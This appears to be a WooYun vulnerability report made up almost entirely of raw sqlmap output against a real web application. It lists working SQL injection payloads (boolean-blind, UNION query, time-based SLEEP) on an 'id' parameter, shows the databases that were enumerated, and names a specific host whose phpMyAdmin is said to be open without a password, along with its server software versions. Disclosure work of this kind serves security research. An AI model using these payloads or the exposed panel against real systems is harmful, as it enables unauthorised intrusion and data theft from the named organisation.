WooYun.org

[*] starting at 21:19:41
[21:19:41] [INFO] resuming back-end DBMS 'mysql' 
[21:19:41] [INFO] testing connection to the target URL
[21:19:41] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[21:19:42] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tpl=page&id=3 AND 1674=1674
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: tpl=page&id=-1583 UNION ALL SELECT NULL,CONCAT(0x71707a7671,0x487566664b4178587a6a,0x7170717671)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tpl=page&id=3 AND SLEEP(5)
---
[21:19:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0.11
[21:19:42] [INFO] fetching database names
[21:19:42] [WARNING] reflective value(s) found and filtering out
[21:19:42] [INFO] the SQL query used returns 2 entries
[21:19:42] [INFO] retrieved: information_schema
[21:19:43] [INFO] retrieved: mech
available databases [2]:                                                                                                                                                                                
[*] information_schema
[*] mech

http://ns1.caes.hku.hk/phpmyadmin  phpmyadmin可不需要密码直接访问

Host name: caes
Operating system: Linux 2.6.32-74-server
Apache: Apache/2.2.14 (Ubuntu)
PHP: 5.3.2-1ubuntu4.30
MySQL: 5.1.73-0ubuntu**.**.**.**